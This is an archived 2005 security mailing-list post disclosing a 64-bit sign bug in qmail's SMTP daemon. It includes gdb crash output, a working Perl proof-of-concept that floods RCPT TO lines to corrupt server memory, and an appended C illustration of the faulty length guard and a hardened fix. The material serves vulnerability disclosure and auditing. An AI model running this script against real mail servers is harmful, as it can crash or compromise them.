Message-ID: <20050509131734.GF5292@sivokote.iziade.m$>
Date: Mon May 9 14:17:29 2005
From: guninski at guninski.com (Georgi Guninski)
Subject: 64 bit qmail fun
On Fri, May 06, 2005 at 04:01:07PM +0300, Georgi Guninski wrote:
> http://www.guninski.com/where_do_you_want_billg_to_go_today_4.html
>
> 3. sign problem in qmail_put/substdio_put
on
FreeBSD amdkotef64.localdomain 5.3-BETA6 FreeBSD 5.3-BETA6 #0: Sat Sep 25 21:49:38 UTC 2004 root@...boy.samsco.home:/usr/obj/usr/src/sys/GENERIC amd64
the static/heap layout is "better" than linux, so
bytecopy(negative) passes and a lot of memory is corrupted:
0x400000 0x408000 8 0 0xffffff0047c857e0 r-x 1 0 0x2180 COW NNC vnode
/var/qmail/bin/qmail-smtpd
0x507000 0x508000 1 0 0xffffff00471e0380 rw- 1 0 0x2180 COW NNC vnode
/var/qmail/bin/qmail-smtpd
0x508000 0x50b000 3 0 0xffffff005b5d6c40 rw- 2 0 0x2180 NCOW NNC swap -
0x50b000 0x1778df000 338914 0 0xffffff005b5d6c40 rwx 2 0 0x2180 NCOW NNC swap -
0x200507000 0x200529000 17 0 0xffffff005d2a6700 r-x 59 28 0x4 COW NC vnode
/libexec/ld-elf.so.1
note memory is contiguous.
Program received signal SIGBUS, Bus error.
0x000000020069afb6 in ldexp () from /lib/libc.so.5
(gdb) info stack
#0 0x000000020069afb6 in ldexp () from /lib/libc.so.5
#1 0x000000020069b07c in ldexp () from /lib/libc.so.5
#2 0x000000020069b2eb in ldexp () from /lib/libc.so.5
#3 0x000000020069bc6d in ldexp () from /lib/libc.so.5
#4 0x000000020069bd58 in malloc () from /lib/libc.so.5
#5 0x00000000004058aa in alloc (n=1040) at alloc.c:20
#6 0x000000000040592f in alloc_re (x=0x508e20, m=896, n=1039) at alloc_re.c:11
#7 0x0000000000405580 in stralloc_readyplus (x=0x508e20, n=897) at stralloc_eady.c:6
#8 0x00000000004023a8 in commands (ss=0x507640, c=0x507660) at commands.c:20
#9 0x00000000004020e1 in main () at qmail-smtpd.c:419
(gdb) x/i $rip
0x20069afb6 <ldexp+1654>: movq $0x2,(%rax,%rsi,8)
(gdb) p/x $rax
$7 = 0x200837000
(gdb) p/x $rsi
$8 = 0x7676767676268
0x50b360: 0x76767676 0x76767676 0x54007676 0x76767676
probably after substdio is corrupted even more fun is possible.
---------------------------------------------------------------
#!/usr/bin/perl -w
# copyright georgi guninski
# cannot be used in vulnerability databases
use IO::Socket;
my $host=$ARGV[0] || "localhost";
my $port=$ARGV[1] || 25;
my $sock=IO::Socket::INET->new(Proto => 'TCP',PeerAddr => $host,
PeerPort=>$port) || die("socket");
my $payload="v" x (1024*1024);
my $lo2 = "v" x (1024*1024);
my $i=0;
my $t;
print $sock "HELO a\r\n";
print $sock "MAIL FROM: a\r\n";
my $leg = 842;
$payload = "v" x $leg;
$cou=0;
my $vp= "v" x (1024*1024);
my $wri = 0;
while (42)
{
print $sock "RCPT TO: ${payload}\r\n";
$t=<$sock>;
$cou++;
$wri += ($leg + 2);
if ($wri > 0x80000010) {last;}
if ($cou % (1024) == 0) {print " .. " . $wri/(1024*1024) . "\n";}
}
print $sock "DATA\r\n";
print $sock "where do you want bill gates to go today?\r\n";
print $sock ".\r\n";
while (42)
{
print $sock "${lo2}";
}
while(<$sock>)
{
print $_;
}
---------------------------------------------------------------
--
where do you want bill gates to go today?
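Added illustration, not part of Guninski's mail and not qmail's source: a toy buffered writer (hypothetical names sio, sio_put, as_int_len, guard_int_trips, guard_size_trips, compare_guards, put_demo) that shows why a queued byte count of 0x80000010, the figure the script above stops at, slips past a "len > n - p" guard whose len is a signed int on LP64, and what the same guard looks like when the length stays a size_t end to end. The corrupted-state refusal in sio_put is an added hardening choice, not something the mail describes.

```c
#include <limits.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical buffered-output structure, loosely modelled on the
 * substdio pattern the mail refers to. Not qmail's code. */
struct sio {
    char  *x;   /* buffer */
    size_t p;   /* bytes already queued */
    size_t n;   /* buffer capacity */
};

/* The lossy step: a byte count tracked in a size_t (or an unsigned
 * stralloc length) is handed to a parameter declared as plain int.
 * On LP64 any count >= 2^31 comes out negative here. (Out-of-range
 * conversion is implementation-defined in C; gcc and clang wrap.) */
int as_int_len(size_t len)
{
    return (int)len;
}

/* Guard written in the signed style: "if (len > n - p) flush".
 * Returns 1 when the guard trips, 0 when it lets a copy proceed.
 * A negative len compares below any non-negative free-space value,
 * so the guard never trips and the copy that follows sees the
 * original huge length once it is converted back to size_t. */
int guard_int_trips(const struct sio *s, int len)
{
    int room = (int)(s->n - s->p);
    return len > room;
}

/* Same guard with unsigned arithmetic throughout: a length that does
 * not fit always trips it, no matter how large it is. */
int guard_size_trips(const struct sio *s, size_t len)
{
    return len > s->n - s->p;
}

/* Run both guards over a fresh 1024-byte buffer for one byte count.
 * Result bit 1 = signed guard tripped, bit 0 = size_t guard tripped. */
int compare_guards(size_t len)
{
    char buf[1024];
    struct sio s = { buf, 0, sizeof buf };
    return (guard_int_trips(&s, as_int_len(len)) << 1)
         | guard_size_trips(&s, len);
}

/* Hardened put: unsigned length, explicit room check, no silent
 * truncation. Returns 0 on success, -1 if len cannot be queued. */
int sio_put(struct sio *s, const char *buf, size_t len)
{
    if (s->p > s->n)            /* inconsistent state: refuse, never copy */
        return -1;
    if (len > s->n - s->p)      /* would overflow: caller must flush first */
        return -1;
    memcpy(s->x + s->p, buf, len);
    s->p += len;
    return 0;
}

/* Queue len bytes of constructed 'v' data into a fresh 1024-byte sio.
 * For len > 1024 sio_put rejects before reading from src at all. */
int put_demo(size_t len)
{
    static char src[1024];
    char dst[1024];
    struct sio s = { dst, 0, sizeof dst };
    memset(src, 'v', sizeof src);
    return sio_put(&s, src, len);
}

int main(void)
{
    size_t big = (size_t)0x80000010;   /* byte count the PoC stops at */
    printf("0x80000010 as int        : %d\n", as_int_len(big));
    printf("guards (int<<1|size_t)   : %d\n", compare_guards(big));
    printf("guards for 2000 bytes    : %d\n", compare_guards(2000));
    printf("sio_put 1025 into 1024   : %d\n", put_demo(1025));
    printf("sio_put 512 into 1024    : %d\n", put_demo(512));
    return 0;
}
```

Run on an amd64 build the signed guard returns 0 for 0x80000010 bytes while the size_t guard returns 1; the same pattern (signed parameter, unsigned source) is what to grep for when auditing a 32-bit-era code base on a 64-bit target.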